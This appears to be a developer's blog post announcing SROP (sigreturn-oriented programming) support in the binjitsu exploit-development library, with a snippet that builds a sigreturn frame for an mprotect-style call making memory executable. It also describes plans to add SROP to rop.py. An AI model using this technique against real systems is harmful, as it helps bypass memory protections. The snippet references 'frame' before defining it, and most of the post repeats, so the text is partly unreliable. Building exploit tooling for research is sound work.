So far I've been working on adding in SROP support to binjitsu for the x86 and x64 platforms and its been merged with the main branch. You can see the code here!
If you wish to use binjitsu to create an SROP frame, you can now simply do something along the lines of :-
>>> context.arch = "amd64"
>>> s = SigreturnFrame(arch="amd64")
>>> assert len(frame) == 248
>>> s.set_regvalue("rax", 0xa)
>>> s.set_regvalue("rdi", 0x00601000)
>>> s.set_regvalue("rsi", 0x1000)
>>> s.set_regvalue("rdx", 0x7)
>>> frame = s.get_frame()
We hope you find this functionality useful!
Another little something I've been working on is an interesting idea suggested by ebeip90; it is to integrate SROP into rop.py. The idea would be along the lines of whats described here. An excerpt from the github issue link :
"In the event that read is not an exported symbol in any of the available libraries (e.g. if libc is not provided) but a syscall gadget is available, it should transparently switch to SROP without the user knowing."
Its a WIP and you can view the current state at the pull request I've created here.
Cheers!
If you wish to use binjitsu to create an SROP frame, you can now simply do something along the lines of :-
>>> context.arch = "amd64"
>>> s = SigreturnFrame(arch="amd64")
>>> assert len(frame) == 248
>>> s.set_regvalue("rax", 0xa)
>>> s.set_regvalue("rdi", 0x00601000)
>>> s.set_regvalue("rsi", 0x1000)
>>> s.set_regvalue("rdx", 0x7)
>>> frame = s.get_frame()
We hope you find this functionality useful!
Another little something I've been working on is an interesting idea suggested by ebeip90; it is to integrate SROP into rop.py. The idea would be along the lines of whats described here. An excerpt from the github issue link :
"In the event that read is not an exported symbol in any of the available libraries (e.g. if libc is not provided) but a syscall gadget is available, it should transparently switch to SROP without the user knowing."
Its a WIP and you can view the current state at the pull request I've created here.
Cheers!